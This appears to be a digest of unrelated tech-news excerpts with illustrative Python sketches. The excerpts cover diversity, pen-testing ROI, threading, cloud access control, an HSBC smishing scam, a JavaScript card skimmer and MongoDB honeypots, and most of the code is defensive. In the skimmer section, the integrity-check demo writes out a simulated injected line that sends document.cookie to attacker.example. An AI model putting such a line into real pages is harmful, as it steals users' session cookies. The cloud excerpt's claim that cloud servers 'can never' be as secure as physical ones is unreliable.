Diversity in tech: 3 stories of perseverance and success

It is easy to fall into comfortable patterns. We train for sports by developing muscle memory, using repetition to ingrain patterns in our brains. It takes an average of 66 days for a behavior to become a habit, and it can require 10 times the effort. Simply stated, hard work and dedication are the foundations for learning, whether you are learning a new language, improving your golf swing, or rethinking workforce demographics. Organizations are especially resistant to change; overcoming that resistance requires cross-organizational commitment and a compelling business imperative. An uncompromising focus on change must cascade throughout an organization and be measured, managed, and reinforced. This resistance to change may explain, at least in part, why the underrepresentation of people of color in technology companies has shown little improvement since 2014. Ideally, the representation of Black people in technology should reflect the overall population, but it does not. According to the Census Bureau, Black people make up 13.4% of the U.S. population but account for only 5% of the workforce at technology companies, and women of color account for even less, at 1%.

Pen Testing ROI: How to Communicate the Value of Security Testing

Defining the ROI of pen testing has its nuances, as there seem to be no tangible results that come directly from the investment. When you implement a pen-testing strategy, you're actively avoiding a breach that could cost your organization money. The cost of a breach is the most obvious data point for measuring ROI, but estimates of that cost vary widely. My advice? First, work toward maturing your security program to the point where engagements with pen testers focus on ensuring the effectiveness of existing controls and security touchpoints in your development life cycle, not solely on checking a compliance box or single-handedly preventing a breach. Leveraging pen testing throughout the development life cycle can help identify issues during development, before deployment, rather than leaving vulnerabilities to be discovered, at greater cost, at a later date. Second, identify metrics, not measurements: business decisions are often made using measurements instead of metrics, but in most cases, decisions driven by measurements (raw data) can be misleading and leave business leaders focusing time, effort, and budget on the wrong activities.
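To make the measurement/metric distinction concrete, here is a minimal Python sketch. The `Finding` record, its fields, and the sample data are hypothetical, chosen only for illustration: a raw count of findings is a measurement, while the share of findings caught before deployment and the mean time to remediate are metrics that relate findings to the development life cycle.

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Optional


@dataclass(frozen=True)
class Finding:
    """One pen-test finding (hypothetical record shape, for illustration only)."""
    severity: str            # e.g. "critical", "high", "medium", "low"
    found_in: str            # "development" or "production"
    opened: date
    closed: Optional[date]   # None while the finding is still open


def raw_count(findings: List[Finding]) -> int:
    """A measurement: how many findings there were, with no context."""
    return len(findings)


def pre_deployment_rate(findings: List[Finding]) -> float:
    """A metric: the share of findings caught before deployment."""
    if not findings:
        return 0.0
    early = sum(1 for f in findings if f.found_in == "development")
    return early / len(findings)


def mean_days_to_remediate(findings: List[Finding]) -> Optional[float]:
    """A metric: average days from discovery to fix, over closed findings only."""
    durations = [(f.closed - f.opened).days for f in findings if f.closed is not None]
    return sum(durations) / len(durations) if durations else None


# Made-up sample data for one quarter.
findings = [
    Finding("high", "production", date(2024, 1, 2), date(2024, 1, 30)),
    Finding("medium", "development", date(2024, 1, 5), date(2024, 1, 7)),
    Finding("low", "development", date(2024, 2, 1), date(2024, 2, 5)),
    Finding("critical", "development", date(2024, 2, 10), None),
]

print(raw_count(findings))               # 4
print(pre_deployment_rate(findings))     # 0.75
print(mean_days_to_remediate(findings))  # about 11.33
```

A rising raw count could mean either weaker code or more thorough testing; a rising pre-deployment rate says more directly whether issues are being caught earlier in the life cycle.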

How to build a data architecture to drive innovation—today and tomorrow

To scale applications, companies often need to push well beyond the boundaries of legacy data ecosystems from large solution vendors. Many are now moving toward a highly modular data architecture that uses best-of-breed and, frequently, open-source components that can be replaced with new technologies as needed without affecting other parts of the data architecture. The utility-services company mentioned earlier is transitioning to this approach to rapidly deliver new, data-heavy digital services to millions of customers and to connect cloud-based applications at scale. For example, it offers accurate daily views on customer energy consumption and real-time analytics insights comparing individual consumption with peer groups. The company set up an independent data layer that includes both commercial databases and open-source components. Data is synced with back-end systems via a proprietary enterprise service bus, and microservices hosted in containers run business logic on the data. ... Exposing data via APIs can ensure that direct access to view and modify data is limited and secure, while simultaneously offering faster, up-to-date access to common data sets.
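One way to picture the modular approach is a minimal Python sketch in which the storage backend sits behind a small interface and consumers reach data only through an API class. All names here (`ConsumptionStore`, `InMemoryStore`, `ConsumptionAPI`) are hypothetical; the in-memory store stands in for whichever commercial or open-source database is plugged in, and swapping it does not touch the API or its callers.

```python
from typing import Dict, List, Protocol


class ConsumptionStore(Protocol):
    """Any backend that can return a customer's meter readings for a day."""

    def readings(self, customer_id: str) -> List[float]: ...


class InMemoryStore:
    """Stand-in backend; a real one might wrap a commercial or open-source database."""

    def __init__(self, data: Dict[str, List[float]]) -> None:
        self._data = {key: list(values) for key, values in data.items()}

    def readings(self, customer_id: str) -> List[float]:
        # Return a copy so callers cannot modify the stored data.
        return list(self._data.get(customer_id, []))


class ConsumptionAPI:
    """Read-only access: callers get derived views, never the store itself."""

    def __init__(self, store: ConsumptionStore) -> None:
        self._store = store

    def daily_total(self, customer_id: str) -> float:
        return sum(self._store.readings(customer_id))

    def compare_to_peers(self, customer_id: str, peers: List[str]) -> float:
        """Ratio of a customer's daily usage to the peer-group average."""
        if not peers:
            raise ValueError("peer group must not be empty")
        peer_average = sum(self.daily_total(p) for p in peers) / len(peers)
        if peer_average == 0:
            raise ValueError("peer group has no recorded usage")
        return self.daily_total(customer_id) / peer_average


api = ConsumptionAPI(InMemoryStore({"a": [1.5, 2.5], "b": [2.0, 2.0], "c": [3.0, 5.0]}))
print(api.daily_total("a"))                   # 4.0
print(api.compare_to_peers("a", ["b", "c"]))  # about 0.667
```

Because `ConsumptionAPI` depends only on the `readings` method, a different backend can replace `InMemoryStore` without changes elsewhere, and callers never get a handle they could use to modify the underlying data.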

Software Techniques for Lemmings

The performance of a system with thousands of threads will be far from satisfying. Threads take time to create and schedule, and their stacks consume a lot of memory unless their sizes are engineered, which won't be the case in a system that spawns them mindlessly. We have a little job to do? Let's fork a thread, call join, and let it do the work. This was popular enough before the advent of <thread> in C++11, but <thread> did nothing to temper it. I don't see <thread> as being useful for anything other than toy systems, though it could be used as a base class to which many other capabilities would then be added. Even apart from these Thread Per Whatever designs, some systems overuse threads because threads are their only encapsulation mechanism. Such systems are not very object-oriented and lack anything that resembles an application framework, so each developer creates their own little world by writing a new thread to perform a new function. The main reason for writing a new thread should be to avoid complicating the thread loop of an existing thread. Thread loops should be easy to understand, and a thread shouldn't try to handle various types of work that force it to multitask and prioritize them, effectively acting as a scheduler itself.
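The alternative to a thread per job can be sketched in Python (the article's context is C++, but the pattern is language-neutral): a fixed number of workers, each running the same simple thread loop that takes one job at a time from a shared queue. `WorkerPool` is a hypothetical name for this sketch; in real Python code, `concurrent.futures.ThreadPoolExecutor` from the standard library provides the same idea.

```python
import queue
import threading


class WorkerPool:
    """A fixed set of threads pulling jobs from one queue, instead of one thread per job."""

    def __init__(self, num_workers):
        self._jobs = queue.Queue()
        self._threads = [threading.Thread(target=self._loop, daemon=True)
                         for _ in range(num_workers)]
        for t in self._threads:
            t.start()

    def _loop(self):
        # The thread loop stays simple: take a job, run it, repeat until told to stop.
        while True:
            job = self._jobs.get()
            if job is None:  # sentinel: this worker should exit
                self._jobs.task_done()
                return
            try:
                job()
            finally:
                self._jobs.task_done()

    def submit(self, job):
        self._jobs.put(job)

    def shutdown(self):
        # One sentinel per worker, queued after all pending jobs, so every job runs first.
        for _ in self._threads:
            self._jobs.put(None)
        for t in self._threads:
            t.join()


results = []
lock = threading.Lock()


def make_job(n):
    def job():
        with lock:
            results.append(n * n)
    return job


pool = WorkerPool(num_workers=4)
for n in range(1000):
    pool.submit(make_job(n))  # 1,000 jobs, but only 4 threads ever exist
pool.shutdown()
print(len(results))  # 1000
```

The thread count is set once, so stack memory and scheduling overhead stay bounded no matter how many small jobs arrive.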

Cloud Security Mistakes Which Everyone Should Avoid

The cloud can be accessed virtually by anyone who possesses the proper credentials, which makes it convenient and vulnerable at the same time. Unlike physical servers, which limit the number of admin users and have stricter access permissions, cloud servers can never provide that level of security. That’s why many small business owners around the world still choose web hosting services that operate on physical servers, especially since a dedicated hosting plan gives them a whole server just for their website. Virtual servers, by contrast, are much easier to access, and their access permissions can sometimes be misused. Controlling access to data kept in the cloud is a tricky balancing act between giving people access to the tools they need to get the job done and keeping data out of the wrong hands. Managing the data efficiently requires a comprehensive policy that not only controls who can access what data and from where, but also monitors who accesses data, when, and from where, so that potential breaches or inappropriate access can be detected. It is therefore vital to educate users on how to secure their cloud sessions, including avoiding public networks and managing passwords effectively.
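A minimal sketch of the policy-plus-monitoring idea, in Python: each request is checked against who may read which dataset and from which networks, and every attempt, allowed or denied, is written to an audit log for later review. The `AccessPolicy` class, the grant format, and the example network range are hypothetical; a real deployment would rely on the cloud provider's own identity and logging services.

```python
import ipaddress
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Dict, List, Set


@dataclass
class AccessPolicy:
    grants: Dict[str, Set[str]]                    # user -> datasets they may read
    allowed_networks: List[ipaddress.IPv4Network]  # e.g. office range or VPN
    audit_log: List[dict] = field(default_factory=list)

    def check(self, user: str, dataset: str, source_ip: str) -> bool:
        """Controls who can access what data and from where."""
        addr = ipaddress.ip_address(source_ip)
        allowed = (dataset in self.grants.get(user, set())
                   and any(addr in net for net in self.allowed_networks))
        # Monitoring: record who, what, when, and from where, whatever the outcome.
        self.audit_log.append({
            "time": datetime.now(timezone.utc),
            "user": user,
            "dataset": dataset,
            "source_ip": source_ip,
            "allowed": allowed,
        })
        return allowed

    def denied_attempts(self) -> List[dict]:
        """Entries worth reviewing for potential breaches or inappropriate access."""
        return [entry for entry in self.audit_log if not entry["allowed"]]


policy = AccessPolicy(
    grants={"alice": {"billing"}},
    allowed_networks=[ipaddress.ip_network("10.0.0.0/8")],
)
print(policy.check("alice", "billing", "10.1.2.3"))     # True: granted, internal network
print(policy.check("alice", "billing", "203.0.113.7"))  # False: public network
print(policy.check("bob", "billing", "10.1.2.3"))       # False: no grant
print(len(policy.denied_attempts()))                    # 2
```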

The Modern Hybrid App Developer

One of the most frustrating parts of building apps is the massive headache of releasing new updates through the app stores and waiting for them to go live. Because hybrid app developers build a big chunk of their app using web technology, they can update their app’s logic and UI in real time whenever they want, in a way that Apple and Google allow because it doesn’t involve binary changes (as long as those updates continue to follow other ToS guidelines). Using a service like Appflow, developers can set up their native Capacitor or Cordova apps to pull in real-time updates across a variety of deployment channels (or environments), and even further customize different versions of their app for different users. Teams use this to fix bugs in their production apps, run A/B tests, manage beta channels, and more. Some services, like Appflow, even support deploying directly to the Apple App Store and Google Play Store, so teams can automate both binary and web updates. This is a major superpower that hybrid app developers have today and native developers do not!
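The channel mechanism can be sketched roughly as follows. This is not Appflow's API; `WebBundle`, `pick_update`, and the `min_native` field are hypothetical. The sketch assumes a device reports its channel, the web bundle it runs, and its native binary version, and only receives a newer bundle from its own channel that its installed binary can run, since a web update cannot change the binary itself.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    major, minor, patch = (int(part) for part in text.split("."))
    return (major, minor, patch)


@dataclass(frozen=True)
class WebBundle:
    version: str     # version of the web layer (logic and UI)
    min_native: str  # oldest native binary this bundle can run on (assumed field)


def pick_update(channels: Dict[str, List[WebBundle]], channel: str,
                current: str, native: str) -> Optional[WebBundle]:
    """Newest bundle on the device's channel that is newer and binary-compatible."""
    candidates = [
        b for b in channels.get(channel, [])
        if parse_version(b.version) > parse_version(current)
        and parse_version(native) >= parse_version(b.min_native)
    ]
    return max(candidates, key=lambda b: parse_version(b.version), default=None)


channels = {
    "production": [WebBundle("1.4.0", "2.0.0"), WebBundle("1.4.1", "2.0.0")],
    "beta": [WebBundle("1.5.0", "2.1.0")],
}
print(pick_update(channels, "production", "1.4.0", "2.0.0"))  # the 1.4.1 bundle
print(pick_update(channels, "beta", "1.4.1", "2.0.0"))        # None: needs binary 2.1.0
```

In this sketch, a bundle that needs newer native code stays unavailable until the device installs an updated binary from the app store, which is where automated binary deployment complements web updates.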

HSBC customers targeted in new smishing scam

The text-phishing, or smishing, campaign begins with a text message purporting to come from HSBC, informing its target that “a new payment has been made” through the HSBC app on their smartphone. Targets are told that if they were not responsible for this payment, they should visit a website to validate their bank account. To the untrained eye, the website link, security.hsbc.confirm-systems.com, could conceivably be legitimate, but the domain it actually belongs to is confirm-systems.com, not an HSBC domain, and it should on no account be opened. Victims who do open it are directed to a fake landing page on a fraudulent website that uses HSBC branding, where they are asked to input their username and password and complete a series of verification steps. The site also tries to extract specific account details and other personally identifiable financial information (PIFI) from its targets. Griffin Law, which works with a number of accountancy groups and financial support teams in the London area, said it had seen a clear spike in reports of the scam, with almost 50 of its customers telling it they had received the smish so far. A number of them said they did not have any HSBC apps installed on their devices, which suggests the scam is quite indiscriminate in its targeting.
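A quick way to see why that link is not HSBC's is to check whether the hostname is a trusted domain or a subdomain of one; merely containing `hsbc` somewhere in the hostname is not enough. In this minimal Python sketch, the function name and the allowlist are assumptions for illustration, not an official list of HSBC domains.

```python
from urllib.parse import urlsplit

# Illustrative allowlist (assumption); a real one would come from the bank's published domains.
TRUSTED_DOMAINS = {"hsbc.co.uk", "hsbc.com"}


def is_trusted_link(url: str, trusted=frozenset(TRUSTED_DOMAINS)) -> bool:
    # urlsplit only recognizes the host after "//", so add a scheme if the link lacks one.
    if "//" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    # Trusted only if the host IS a trusted domain or ends with "." + a trusted domain.
    return any(host == d or host.endswith("." + d) for d in trusted)


print(is_trusted_link("security.hsbc.confirm-systems.com"))  # False
print(is_trusted_link("https://www.hsbc.co.uk/login"))       # True
```

The same check rejects `https://hsbc.co.uk@evil.example`, where the text before `@` is user information and the real host is `evil.example`.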

Card Skimmer Found Hitting Vulnerable E-Commerce Sites

Despite the large pool of potential targets, Malwarebytes has only been able

to identify a few victims. "We found over a dozen websites that range from

sports organizations, health, and community associations to (oddly enough) a

credit union. They have been compromised with malicious code injected into one

of their existing JavaScript libraries," Segura says. Some historical evidence

of other victims who have been hit in the past was uncovered as part of his

research, he says, but they have since been remediated. The total number of

targets number is not available. The skimmer steals payment card numbers and

tries to also swipe passwords, although the latter activity is not correctly

implemented and does not always work, according to Malwarebytes. Segura says

the skimmer is not that different from others currently operating in how it

collects and exfiltrates data. The novelty is that it was only found on



ASP.NET websites. "The skimmer is embedded in an existing JavaScript library

used by a victim site. There are variations on how the code is structured but

overall, it performs the same action of contacting remote domains belonging to

the threat actor," Segura says.
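Because the skimmer was injected into an existing JavaScript library, one defensive habit is to pin a hash of each library and flag any file that no longer matches. This Python sketch computes hashes in the Subresource Integrity format (`sha384-` followed by the base64-encoded digest), the same format browsers check in a `<script integrity=...>` attribute; the function names and the sample library contents are hypothetical.

```python
import base64
import hashlib


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return a Subresource Integrity string such as 'sha384-<base64 digest>'."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def library_unchanged(content: bytes, pinned: str) -> bool:
    """True if the file still matches the hash recorded when it was known to be clean."""
    algorithm = pinned.split("-", 1)[0]
    return sri_hash(content, algorithm) == pinned


original = b"function add(a, b) { return a + b; }"
pinned = sri_hash(original)  # recorded at deployment time

# Simulated injection: extra code appended to the same library file.
tampered = original + b"\nnew Image().src = 'https://attacker.example/c?' + document.cookie;"

print(library_unchanged(original, pinned))  # True
print(library_unchanged(tampered, pinned))  # False
```

When the library is served from the site's own server, as in the attacks described above, the comparison would run as a periodic file-integrity check on that server rather than relying on the browser alone.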

MongoDB is subject to continual attacks when exposed to the internet

After seeing how consistently database breaches were occurring, Intruder planted honeypots to find out how these attacks happen, where the threats are coming from, and how quickly they take place. Intruder set up a number of unsecured MongoDB honeypots across the web, each filled with fake data. Network traffic was monitored for malicious activity, and if password hashes were exfiltrated and seen crossing the wire, that would indicate a database had been breached. The research shows that MongoDB is subject to continual attacks when exposed to the internet. Attacks are carried out automatically and indiscriminately, and on average an unsecured database is compromised less than 24 hours after going online. ... Attacks originated from locations all over the globe, though attackers routinely hide their true location, so there’s often no way to tell where attacks are really coming from. The fastest breach came from an attacker using the Russian ISP Skynet, and over half of the breaches originated from IP addresses owned by a Romanian VPS provider.
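A minimal Python sketch of a pre-deployment check for the two settings most likely to leave a database in a similar state: listening beyond loopback (`net.bindIp` / `net.bindIpAll`) and access control left off (`security.authorization`). The function name, the messages, and the loopback list are hypothetical; the config is assumed to be already parsed from YAML into a dict, and the localhost default reflects MongoDB 3.6 and later.

```python
from typing import Any, Dict, List

# Addresses that only accept local connections (assumed list for this sketch).
LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def exposure_warnings(config: Dict[str, Any]) -> List[str]:
    """Return warnings for a parsed mongod config that may leave the database exposed."""
    net = config.get("net", {})
    security = config.get("security", {})
    # Assumption: with no bindIp set, mongod 3.6+ listens on localhost only.
    bind_ips = {ip.strip() for ip in str(net.get("bindIp", "localhost")).split(",")}

    warnings = []
    if net.get("bindIpAll", False) or not bind_ips <= LOOPBACK:
        warnings.append("listens on a non-loopback interface")
    # Access control is off unless security.authorization is set to "enabled".
    if security.get("authorization", "disabled") != "enabled":
        warnings.append("security.authorization is not enabled")
    return warnings


print(exposure_warnings({"net": {"bindIp": "0.0.0.0"}}))
print(exposure_warnings({"net": {"bindIp": "127.0.0.1"},
                         "security": {"authorization": "enabled"}}))
```

The first config produces both warnings, the combination that makes a database reachable and readable by anyone; the second produces none.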

How data is fundamental to manufacturing’s digital transformation

The key to creating and deploying an effective data strategy comes down to three factors: sponsorship, a standardised platform and robust governance. Sponsorship is vital, according to Greg Hanson, particularly in larger organisations where buy-in can be more difficult to achieve. “Additionally, the successful deployment of that strategy requires engagement with the organisation as a whole, and a cultural acceptance of responsibility regarding data given GDPR and privacy laws,” he added. Helping to drive this combination of board-level sponsorship and enterprise-wide engagement are Chief Data Officers, newly created executive roles tasked with deploying and monitoring the effectiveness of data strategies and the adoption of modern, cloud-based architectures, the foundation of many industrial digital transformation initiatives. “There are so many technologies readily available in the cloud space now that companies face the risk of ‘cloud sprawl’ which degrades the impact of their digital transformation and data management,” Hanson continued.
